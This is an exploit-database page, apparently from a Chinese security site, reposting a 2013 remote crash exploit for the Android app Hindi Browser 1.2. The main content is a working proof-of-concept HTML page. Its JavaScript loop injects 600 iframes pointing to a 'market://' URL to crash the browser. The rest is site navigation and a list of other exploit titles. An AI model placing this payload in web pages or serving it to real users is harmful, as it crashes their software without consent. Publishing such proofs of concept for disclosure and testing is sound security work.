首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hindi Browser 1.2 Denial Of Service
来源:Gurunsb.com 作者:Bhadoria 发布时间:2013-06-03  
# Exploit Title: Hindi Browser Remote Crash Exploit
# Date: 06/01/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link: https://play.google.com/store/apps/details?id=com.hb&feature=search_result#?t=W251bGwsMSwxLDEsImNvbS5oYiJd
# Version: 1.2
# Category:Remote 
# Tested On : Android 4.1.2
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Poc :-http://www.youtube.com/watch?v=nX0IveByeiw&feature=youtu.be

Code :-
#########################################
<html>
<body>
 
<script type="text/javascript">
 
var m_frame = "";
 
for(var i = 0; i < 600; i++)
{
 
  m_frame = document.createElement("iframe");
  m_frame.setAttribute("src", "market://a");
 
  document.body.appendChild(m_frame);
}
</script>
 
</body>
</html>

###########################################
Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·YeaLink IP Phone Firmware 9.70
·Apache Struts includeParams Re
·BOINC Manager (Seti@home) 7.0.
·Oracle WebCenter Content Check
·ModSecurity Remote Null Pointe
·Windows内核EPATHOBJ 0day explo
·Lianja SQL 1.0.0RC5.1 db_netse
·Seowonintech Routers Remote Ro
·Zyxel NBG5715 Local admin priv
·DS3 Authentication Server Comm
·Intrasrv Simple Web Server 1.0
·Imperva SecureSphere Operation
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved